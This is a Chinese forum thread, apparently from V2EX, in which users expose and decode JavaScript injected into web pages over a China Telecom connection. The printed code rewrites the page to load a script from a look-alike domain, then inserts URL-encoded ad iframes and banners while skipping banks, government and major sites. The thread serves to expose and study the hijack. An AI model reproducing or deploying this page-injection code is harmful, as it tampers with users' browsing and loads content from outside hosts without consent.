[电信] 频繁刷新页面（ view-source）有一定几率能够看到这段代码


<html><head></head><body><script>!function(){function a(){var a=new Date;a.setTime(a.getTime()+6e4),document.cookie="sessioned=1;expires="+a.toUTCString()}function b(b){a(),setTimeout(function(){location.href=location.href},b)}var d,e,f,c=1e4;try{if(!/sessioned=1/.test(document.cookie)){a(),e=document.createElement("script"),f=!1,e.src="http://game.happy.qq.huaxinddc.com/wz3/gc.js?1",d=new XMLHttpRequest,d.open("GET",window.location,!0),d.setRequestHeader("X-Requested-With","XMLHttpRequest");try{d.timeout=c}catch(g){}d.send(),d.onreadystatechange=function(){try{if(4==d.readyState){if(200!=d.status||"text/html"!=d.getResponseHeader("Content-Type"))throw"";text=d.responseText.replace(/<\/body>/i,e.outerHTML+"</body>"),document.open("text/html","replace"),document.write(text),setTimeout(function(){document.close()},1e3),f=!0}}catch(a){b(100)}}}}catch(g){b(150)}finally{setTimeout(function(){f||b(1)},c+1e3)}}();</script></body></html>

v2代码不自动换行的么

可疑JS

(function () {
    //var re = /\.edu|\.gov|\.org|\.189\.cn|\.ct10000\.com|\.118114\.cn|\.10086|\.10010|\.icbc\.com\.cn|\.ccb\.com|\.abchina\.com|\.boc\.cn|\.bankcomm\.com|\.cmbchina\.com|\.pingan\.com|\.cib\.com\.cn|\.cgbchina\.com\.cn|\.psbc\.com|\.spdb\.com|\.microsoft\.com|\.apple\.com|\.bing\.com|\.baidu\.com|\.qq\.com|\.qzone|\.gtimg\.cn|\.weibo\.com|\.taobao\.com|\.tmall\.com|\.alipay\.com|\.alibaba\.com|\.aliyun\.com|\.aliexpress\.com|\.1688\.com|\.alimama\.com|\.alitrip\.com|\.sina\.com\.cn|\.sina\.cn|\.sohu\.com|\.163\.com|\.360\.cn|120\.24\.157\.107|\.haosou\.com|\.hao123\.com|\.sogou\.com|\.2345\.com|\.duba\.com|\.114la\.com|\.zzgjj\.com|\.people\.com|\.people\.cn|\.12306\.cn|\.153\.cn|\.xinhuanet\.com|\.ifeng\.com|\.china\.com|pop\.10jqka\.com\.cn|\.jd\.com|\.jd\.hk|\.jumei\.com|\.qunar\.com|\.gome\.com\.cn|\.suning\.com|\.yhd\.com|\.metao\.com|\.lefeng\.com|\.mogujie\.com|\.vip\.com|\.ctrip\.com|\.linezing\.com|\.youmi\.net|\.qihuo\.com|\.wps\.cn|\.rising\.com\.cn|\.58\.com|\.fun\.tv|\.funshion\.com|\.youku\.com|\.kankan\.com|\.youdao\.com|\.kugou\.com|\.pptv\.com|\.baofeng|\.iqiyi\.com|\.pps\.tv|\.111\.com\.cn|\.duowan\.com|\.wandoujia\.com|\.dingtalk\.com/;
    var re = /\.edu|data\.360\.com\.lingzhi1532\.com|\.huaxinddc\.com|\.cctv\.|\.sina\.com|\.xueshengshetuan\.com|\.cahce\.mini\.laotukong\.com|\.matchdp\.sankuai\.cn\.shuyang5\.com|\.gov|\.org|\.189\.cn|\.ct10000\.com|\.118114\.cn|\.10086|\.10010|\.icbc\.com\.cn|\.ccb\.com|\.abchina\.com|\.boc\.cn|\.bankcomm\.com|\.cmbchina\.com|\.pingan\.com|\.cib\.com\.cn|\.cgbchina\.com\.cn|\.psbc\.com|\.spdb\.com|\.microsoft\.com|\.apple\.com|\.bing\.com|\.baidu\.com|\.qq\.com|\.qzone|\.gtimg\.cn|\.weibo\.com|\.taobao\.com|\.tmall\.com|\.alipay\.com|\.alibaba\.com|\.aliyun\.com|\.aliexpress\.com|\.1688\.com|\.alimama\.com|\.alitrip\.com|\.360\.cn|120\.24\.157\.107|\.haosou\.com|\.hao123\.com|\.sogou\.com|\.zzgjj\.com|\.people\.com|\.people\.cn|\.12306\.cn|\.153\.cn|\.xinhuanet\.com|\.ifeng\.com|\.china\.com|pop\.10jqka\.com\.cn|\.linezing\.com|\.youmi\.net|\.qihuo\.com|\.wps\.cn|\.rising\.com\.cn/;
    var _ad_div = '_hev_v';
    var _isMobile = false;
    try {
        if (window.innerWidth <= 600 && window.innerHeight <= 800) {
            _isMobile = true;
        }
    } catch (e) {
    }
    if (!re.test(location.href) && !document.getElementById(_ad_div)) {
        //console.log(re.test(location.href));
        //console.log(document.getElementById(_ad_div));
        var _style = '';
        if (_isMobile) {
            _style = 'z-index: 2147483646;' +
            'text-align: center;' +
            'margin: 0 auto;' +
            'width: ' + window.innerWidth + 'px;';
        } else {
            _style = 'display: inline-block;' +
            'width: 300px;' +
            'height: 250px;' +
            'position: fixed;' +
            'bottom: 0px;' +
            'right: 18px;' +
            'z-index: 2147483646;';
        }

        var s = new Array();
        var _div = '%3Cdiv%20id%3D%22' + _ad_div + '%22' + ' style%3D%22' + escape(_style) + '%22%3E';
        document.write(unescape(_div));
      if (_isMobile) {
	s.push("%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20%20%20%20var%20u_id%20%3D%20%22u10829%22%3B%0A%3C%2Fscript%3E%0A%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22http%3A%2F%2Fdata.360.com.lingzhi1532.com%2Fwz3%2Fg.js%22%3E%3C%2Fscript%3E");
        } else {
		s.push("%3Ciframe%20scrolling%3D%22no%22%20allowtransparency%3D%22true%22%20marginheight%3D%220%22%20marginwidth%3D%220%22%20src%3D%22http%3A%2F%2Fgame.happy.qq.huaxinddc.com%2Fwz3%2Fnormal.html%22%20align%3D%22center%2Ccenter%22%20frameborder%3D%220%22%20height%3D%22500px%22%20width%3D%22300px%22%3E%3C%2Fiframe%3E");
        }
        //s[Math.floor(Math.random()* s.length)]
        var ads = s[Math.floor(Math.random() * s.length)];
       // var ads = s[0];
	   if (typeof ads == 'function')
	   {
		   ads();
	   }else{
		   document.write(unescape(ads));
	   }
        //don't close this div FUCK IE
        //document.write((' '));
        //document.write(unescape('%3C/div%3E'));

        if (_isMobile){
            setMobilePosition();
        }

    }
    function isIE() {
        var myNav = navigator.userAgent.toLowerCase();
        return (myNav.indexOf('msie') != -1) ? parseInt(myNav.split('msie')[1]) : false;
    }
    function setMobilePosition(){
        var d = document.getElementById(_ad_div);
        if (!d){
            setTimeout(function(){setMobilePosition();},1000)
        }else{
            document.body.insertBefore(d, document.body.firstChild);
        }
    }
})();

文件地址： http://game.happy.qq.huaxinddc.com/wz3/gc.js?1

Coxxs

2016-07-31 08:57:17 +08:00

里面有两段 urlencode 过的 js ，分别是：
<script type="text/javascript">
var u_id = "u10829";
</script>
<script type="text/javascript" src="http://data.360.com.lingzhi1532.com/wz3/g.js"></script>
和
<iframe scrolling="no" allowtransparency="true" marginheight="0" marginwidth="0" src="http://game.happy.qq.huaxinddc.com/wz3/normal.html" align="center,center" frameborder="0" height="500px" width="300px"></iframe>

前者（_isMobile ） js 解压后：
var _2 = Math.floor(Math.random() * (3 + 1));
var _1 = "http://data.360.com.lingzhi1532.com/wz3/g.html?p=1";
if (_2 == 0) {
_1 = "http://image.qq.com.xueshengshetuan.com/sj/m/normal.html?p=12"
} else if (_2 == 1) {
_1 = "http://data.360.com.lingzhi1532.com/wz3/g.html?p=1"
} else {
_1 = "http://data.360.com.lingzhi1532.com/wz3/g.html?p=2"
}(function() {
if (!document.body) return setTimeout(arguments.callee, 50);
var lm_id = "_0";
lm_host = _1, lm_e = document.createElement('div');
lm_e.style.cssText = "width:100%; height: 90px;position: fixed; bottom: 0px;left:0; z-index: 1000;overflow: hidden; background-color:#fff;overflow:hidden;";
lm_e.id = lm_id;
lm_e.innerHTML = '<iframe src="' + lm_host + '" width="100%" height="90px" frameborder="0" scrolling="no"></iframe><img border="0" onClick="delete_tpy();" style="cursor:pointer;position:absolute;right:2px;top:2px;z-index:999" src="http://www.gdxxb.com/a/images/close.png" alt="X"></iframe>';
document.body.appendChild(lm_e)
})();

function delete_tpy() {
var test = document.getElementById("_0");
test.innerHTML = ''
}

后者（！_isMobile ）：

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="viewport"
content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
<meta name="viewport" content="width=device-width" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>HeNan139 Home Nav</title>
</head>
<body>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle"
style="display:inline-block;width:300px;height:250px"
data-ad-client="ca-pub-8280740605989318"
data-ad-slot="4646879585"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</body>
</html>